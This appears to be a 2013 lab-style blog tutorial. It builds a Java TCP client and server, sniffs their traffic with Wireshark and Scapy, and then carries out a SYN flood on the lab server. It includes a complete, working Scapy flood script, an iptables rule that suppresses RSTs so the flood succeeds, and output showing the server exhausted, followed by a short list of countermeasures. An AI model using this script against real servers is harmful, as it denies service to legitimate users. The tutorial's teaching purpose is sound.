Saturday, 4 May 2013

SYN Flood Attack using SCAPY

Introduction

1. TCP Socket Programming

1.1 Socket
A socket is one endpoint of a two-way communication link between two programs running on the network. An endpoint is a combination of an IP address and a port number.

1.2 TCP Socket Program (Server Module)

MultiThreadServer.java

import java.io.*;
import java.net.*;

public class MultiThreadServer implements Runnable {
   Socket s;

   MultiThreadServer(Socket s) {
      this.s = s;
   }

   public static void main(String args[]) throws Exception {
      ServerSocket ss = new ServerSocket(3636);
      System.out.println("Listening");

      while (true) 
      {
         Socket sock = ss.accept();
         System.out.println("Connected");
         new Thread(new MultiThreadServer(sock)).start();
      }
   }

 public void run() {
      try 
      {
         BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));		
         int a = Integer.parseInt(in.readLine());
         int b = Integer.parseInt(in.readLine());

         char[] op = (in.readLine().toCharArray());			
         PrintStream out = new PrintStream(s.getOutputStream()); 				
         switch(op[0])
         {
            case '+':
               out.println(a+b);
               break;
	case '-':
               out.println(a-b);
               break;
	case '*':
               out.println(a*b);
               break;
	case '/':
               out.println(a/b);
               break;
	case '%':
               out.println(a%b);
               break;
	default:
               out.println("Invalid operator");				
         }				
         System.out.println("Result sent on client machine...");
         out.close();
         s.close();
      } 
      catch (IOException e) 
      {
         System.out.println(e);
      }
   }
}

1.3 TCP Socket Program (Client Module)

MyClient.java


import java.net.*;
import java.io.*;

class MyClient {
   public static void main(String[] args) {
      try
      {
         Socket s = new Socket("localhost",3636);
         PrintStream out = new PrintStream(s.getOutputStream());
         BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
         BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));
         System.out.print("Enter Num 1 : ");
         out.println(br.readLine());			
         System.out.print("Enter Num 2 : ");			
         out.println(br.readLine());
         System.out.print("Enter operand : ");
         String op = br.readLine();
         out.println(op);
         System.out.println("\nResult : " + in.readLine());						
         s.close();
      }
      catch(Exception e)
      {
         e.printStackTrace();
      }
   }
}

Brief Explanation

The server program will start first. It is a multithreaded program hence it can serve mmultiple clients on different threads. 

The client program will send a connection request. Once the connection is established, client program sends two numbers and sign. The server performs operation according to sign and result is returned to the client which is displayed on the standard output device of the client.



2. Simulation Environment Configuration

2.1 Client


IP Address
192.168.10.1
Operating System
Linux Mint (or any other flavor of Linux)
Tools
JRE, Wireshark, Scapy
Program
MyClient.java
2.2 Server
IP Address
192.168.10.2
Operating System
Any
Tools
JRE
Program
MultiThreadServer.java


Start the Server java program….

Packet Sniffing

1. Wireshark

1.1 Introduction

Wireshark is a network packet analyzer. It tries to capture network packets and to display that packet data as detailed as possible.

1.2 Capturing TCP Packets

On the client machine, start wireshark and do the following.
1. sudo wireshark
2. Go to Capture Menu, then Interfaces and click Start of eth0.
3. In Filter text box write tcp, so that the filtration for tcp packets can take place.
4. Start the client java program #java MyClient
5. Send two numbers and sign. The result will be displayed.

The next job is to study the packets exchanged during this communication.

1.3 Result Analysis

At the time of connection establishment, the client (192.168.10.1) sends a SYN packet. The server (192.168.10.2) sends SYN + ACK. To this the client replies with an ACK.




When a number is entered and sent, we have observed that total four packets are exchanged between client and server. The first packet contains the actual number, to which an ACK is sent by the server. The next packet contains '\n' and again on its receipt, the server sends an ACK.


If we check the data, the number 12 looks as follows.

2. Scapy

2.1 Introduction

Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.

2.2 Sniffing Packets

We can capture packets using the sniff() method. Following are some self explanatory examples of sniff().
  • sniff(iface="eth0")
  • sniff(iface="eth0", filter="tcp")
  • sniff(iface="eth0", filter="port 1295")
  • sniff(iface="eth0", filter="tcp port 80")
If you wish to display the summary or complete details of the captured packet, then use the following.
  • sniff(iface="eth0", filter="tcp", prn=lambda x: x.summary() )
  • sniff(iface="eth0", filter="tcp", prn=lambda x: x.show() )
  • sniff(iface="eth0", filter="tcp", prn=lambda x: ls(x) )
The prn specifies the function to be executed when a packet which passes the filter criteria is captured. Python supports the creation of anonymous functions (i.e. functions that are not bound to a name) at runtime, using a construct called "lambda".

2.3 Result Analysis

To capture the packets, we will use the following piece of code.

sniff(iface="eth0", filter="tcp", prn=lambda x: x.summary() )

The summary will show following output as packets exchanged at the time of connection establishment.



Where, S represents SYN and A represents ACK.



When the first data packet containing num1 as 12 is sent to the server then following packets will be exchanged.






Where, P stands for PUSH flag set. The RAW specifies the layer above TCP containing the raw data.

The details of the packet and the Raw contents can be seen using the following sniff() method code.

sniff(iface="eth0", filter="tcp", prn=lambda x: x.show() )

In the result you can see the packets with their raw content. In our case, when we send 12 as the first number then two packets, first containing the data 12 and the next containing the new line character are sent to the server. The snapshot of the packet containing 12 as an output for show() method is follows.




SYN Flood Attack

1. TCP 3-Way Handshake

1.1 Introduction

Below is a (very) simplified diagram of the TCP 3-way handshake process.



  1. Alice sends a TCP SYNchronize packet to Server
  2. Server receives Alice's SYN
  3. Server sends a SYNchronize-ACKnowledgement
  4. Alice receives Server's SYN-ACK
  5. Alice sends ACKnowledge
  6. Server receives ACK. 
  7. TCP socket connection is ESTABLISHED.

1.2 SYN Flood Attack

A SYN flood is a type of DoS attack.

A SYN packet notifies a server of a new connection. The server then allocates some memory in order to handle the incoming connection, sends back an acknowledgement, then waits for the client to complete the connection and start sending data. By spoofing large numbers of SYN requests, an attacker can fill up memory on the server, which will sit there waiting for more data that never will arrive. Once memory has filled up, the server will be unable to accept connections from legitimate clients. This effectively disables the server.


2. SYN Flood Attack using Scapy

2.1 Creation and Sending of SYN packets

In order to perform SYN flood attack using scapy, the first step is make a SYN packet and send to the server. For this we need FQDN or IP address (in our case 192.168.10.2) and Port Number (if you want to attack a website running HTTP, then port = 80; in our case port = 3636).

Following is the format for creating a SYN packet with S flag set.

pkt = IP ( dst="192.168.10.2", id=1111, ttl=99)/ TCP ( sport=1234, dport=3636, seq=12345, ack=1000, window=1000, flags="S")

And finally send the packet.  

send(pkt)

Start scapy with sniff in another terminal to capture the packets. The output is as follows.


After analyzing the above packets captured, you will find that client (192.168.10.1) sends a SYN packet which is created by us. Next the server (192.168.10.2) sends an SYN+ACK. Then the client sends a R i.e. request to resent the connection. This packet which is going from client machine is not created by us.

R indicates to the receiving computer that the computer should immediately stop using the TCP connection – It should not send any more packets using the connection's identifying numbers (called ports),

The malformed/manipulated packets crafted by Scapy is seen by the kernel, which sends RST responses (resets) to the target, since it (the attacker’s kernel) didn’t initiate this TCP communication. To prevent this, we should use the below iptables rules, so that the kernel’s RSTs will not get to the target — otherwise, the target’s SYN buffer will not get full, and the DDoS attack will fail.

iptables –A OUTPUT –p tcp –s 192.168.10.1 --tcp-flags RST RST –j DROP

This rule will DROP packets from the OUTPUT chain that have the RST flag set. The iptables rules will only apply to the kernel stack layer, not the application layer — so it will not apply to packets generated by Scapy, which creates the entire packet in its space.

Now if you will send the same packet, you will observe that the server will send SYN+ACK repeatedly as it will think that the SYN+ACK packet is lost because we are not replying with an ACK. The output is as follows.


As we have to perform SYN FLOODING i.e. spoofing by sending large numbers of SYN requests from different ports, we use RandShort() to generate source port numbers. The code is as follows.

pkt = IP ( dst="192.168.10.2", id=1111, ttl=99)/ TCP ( sport=RandShort(), dport=3636, seq=12345, ack=1000, window=1000, flags="S")

To send packet in a loop we will use the following piece of code which re-generates the packet and send at an interval of 0.3 seconds.

ans,unans=srloop(pkt,inter=0.3,retry=2,timeout=4)

2.2 SYN Flood python program

SYN_Flood.py
#!/usr/bin/python
import sys
from scapy.all import *
print "Field Values of packet sent"
p=IP(dst="192.168.10.2",id=1111,ttl=99)/TCP(sport=RandShort(),dport=3636,seq=12345,ack=1000,window=1000,flags="S")
print "Sending Packets in 0.3 second intervals for timeout of 4 sec"
ans,unans=srloop(p,inter=0.3,retry=2,timeout=4)
print "Summary of answered & unanswered packets"
ans.summary()
unans.summary()


2.3 Result Analysis

Open a terminal, set the iptable rule and execute the python script

$sudo ./SYN_Flood.py

Now once the program will start executing, it will send SYN packets to destination port 3636 from random source port numbers. For few packets the server will reserve space in the buffer and reply with a SYN+ACK, waiting for ACK from client which will never be sent. Once the server TCP buffer gets exhausted, it will send RA (Reset + ACK) packets. This packet means that the SYN is received and acknowledged by the server but a connection to the server is refused. We can see this pattern in the following output obtained after executing the above script.

Output

Summary of answered & unanswered packets

IP / TCP 192.168.10.1:65243 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:65243 SA / Padding
IP / TCP 192.168.10.1:61038 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:61038 SA / Padding
IP / TCP 192.168.10.1:5252 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:5252 SA / Padding
IP / TCP 192.168.10.1:64350 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:64350 SA / Padding
IP / TCP 192.168.10.1:30948 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:30948 SA / Padding
IP / TCP 192.168.10.1:16905 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:16905 SA / Padding
IP / TCP 192.168.10.1:44247 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:44247 SA / Padding
IP / TCP 192.168.10.1:24290 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:24290 SA / Padding
IP / TCP 192.168.10.1:9592 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:9592 SA / Padding
IP / TCP 192.168.10.1:31359 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:31359 SA / Padding
IP / TCP 192.168.10.1:37823 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:37823 SA / Padding
IP / TCP 192.168.10.1:62290 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:62290 SA / Padding
IP / TCP 192.168.10.1:56259 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:56259 SA / Padding
IP / TCP 192.168.10.1:18769 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:18769 SA / Padding
IP / TCP 192.168.10.1:1689 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:1689 SA / Padding
IP / TCP 192.168.10.1:31853 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:31853 SA / Padding
IP / TCP 192.168.10.1:44976 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:44976 SA / Padding
IP / TCP 192.168.10.1:5205 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:5205 SA / Padding
IP / TCP 192.168.10.1:64724 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:64724 SA / Padding
IP / TCP 192.168.10.1:26798 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:26798 SA / Padding
IP / TCP 192.168.10.1:41350 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:41350 SA / Padding
IP / TCP 192.168.10.1:53140 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:53140 SA / Padding
IP / TCP 192.168.10.1:11960 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:11960 SA / Padding
IP / TCP 192.168.10.1:46454 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:46454 SA / Padding
IP / TCP 192.168.10.1:44691 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:44691 SA / Padding
IP / TCP 192.168.10.1:45765 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:45765 SA / Padding
IP / TCP 192.168.10.1:23598 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:23598 SA / Padding
IP / TCP 192.168.10.1:7059 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:7059 SA / Padding
IP / TCP 192.168.10.1:35802 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:35802 SA / Padding
IP / TCP 192.168.10.1:58533 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:58533 SA / Padding
IP / TCP 192.168.10.1:12592 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:12592 SA / Padding
IP / TCP 192.168.10.1:44884 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:44884 SA / Padding
IP / TCP 192.168.10.1:38450 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:38450 SA / Padding
IP / TCP 192.168.10.1:33849 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:33849 SA / Padding
IP / TCP 192.168.10.1:24307 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:24307 SA / Padding
IP / TCP 192.168.10.1:19023 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:19023 SA / Padding
IP / TCP 192.168.10.1:35738 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:35738 SA / Padding
IP / TCP 192.168.10.1:45454 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:45454 SA / Padding
IP / TCP 192.168.10.1:53058 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:53058 SA / Padding
IP / TCP 192.168.10.1:30791 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:30791 SA / Padding
IP / TCP 192.168.10.1:26318 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:26318 SA / Padding
IP / TCP 192.168.10.1:43197 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:43197 SA / Padding
IP / TCP 192.168.10.1:58788 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:58788 SA / Padding
IP / TCP 192.168.10.1:10169 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:10169 SA / Padding
IP / TCP 192.168.10.1:38943 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:38943 SA / Padding
IP / TCP 192.168.10.1:64417 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:64417 SA / Padding
IP / TCP 192.168.10.1:36715 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:36715 SA / Padding
IP / TCP 192.168.10.1:27129 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:27129 SA / Padding
IP / TCP 192.168.10.1:43398 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:43398 SA / Padding
IP / TCP 192.168.10.1:58586 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:58586 SA / Padding
IP / TCP 192.168.10.1:4177 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:4177 RA / Padding
IP / TCP 192.168.10.1:44579 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:44579 RA / Padding
IP / TCP 192.168.10.1:23154 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:23154 RA / Padding
IP / TCP 192.168.10.1:28552 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:28552 RA / Padding
IP / TCP 192.168.10.1:13225 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:13225 RA / Padding
IP / TCP 192.168.10.1:58227 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:58227 RA / Padding
IP / TCP 192.168.10.1:59670 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:59670 RA / Padding
IP / TCP 192.168.10.1:42178 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:42178 RA / Padding
IP / TCP 192.168.10.1:8175 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:8175 RA / Padding
IP / TCP 192.168.10.1:36199 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:36199 RA / Padding
IP / TCP 192.168.10.1:56668 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:56668 RA / Padding
IP / TCP 192.168.10.1:37179 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:37179 RA / Padding
IP / TCP 192.168.10.1:46672 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:46672 RA / Padding
IP / TCP 192.168.10.1:5942 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:5942 RA / Padding
IP / TCP 192.168.10.1:30221 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:30221 RA / Padding
IP / TCP 192.168.10.1:42416 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:42416 RA / Padding
IP / TCP 192.168.10.1:23643 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:23643 RA / Padding
IP / TCP 192.168.10.1:41531 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:41531 RA / Padding
IP / TCP 192.168.10.1:8848 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:8848 RA / Padding
IP / TCP 192.168.10.1:21906 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:21906 RA / Padding
IP / TCP 192.168.10.1:39280 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:39280 RA / Padding
IP / TCP 192.168.10.1:46294 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:46294 SA / Padding
IP / TCP 192.168.10.1:62105 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:62105 SA / Padding
IP / TCP 192.168.10.1:19673 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:19673 SA / Padding
IP / TCP 192.168.10.1:28577 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:28577 SA / Padding
IP / TCP 192.168.10.1:57872 > 192.168.10.2:3636 S ==> IP / TCP 192.168.10.2:3636 > 192.168.10.1:57872 SA / Padding


When the server is exhausted and resetting all the connections, at this time even if a genuine client tries to access the services of the server application, then its request for connection will also be refused.























Conclusion

The SYN flooding attack is a well-known attack under the category of Denial of Service (DoS) attacks. Hence many a servers employ different methodologies to defense the server against it. There are a number of well-known countermeasures listed in RFC 4987 including:
  • Filtering
  • Increasing Backlog
  • Reducing SYN-RECEIVED Timer
  • Recycling the Oldest Half-Open TCB
  • SYN Cache
  • SYN cookies
  • Hybrid Approaches
  • Firewalls and Proxies
In a networking workshop held at VJTI, Mumbai dated 29-08-2012, Dr. Deven Shah (SPIT College) discussed another method which is an improvisation of the old IP blocking method. He said that in the traditional way, once one or more malicious IP addresses from where DoS attacks are waged, are detected, they are simply blocked. In this approach once the attackers come to know that their IP is blocked, they will change the IP and attack again. So this strategy won’t be effective against such attacks.

A better solution - after identifying such malicious IP addresses, increase the amount of time between SYN received and SYN+ACK sent by the server to the client. This will make the attacker feel that the server has come under attack and is loosing its performance capabilities; whereas this will not be the case as the server will be catering the needs of other genuine clients at a normal rate.

The servers which do not employ such mechanisms can be attacked easily using the above SYN Flood python program.

References

en.wikipedia.org/
http://www.secdev.org/projects/scapy/
http://www.secdev.org/projects/scapy/demo.html
http://www.python.org/
http://www.linuxforu.com/2011/10/syn-flooding-using-scapy-and-prevention-using-iptables/

Do you like this article?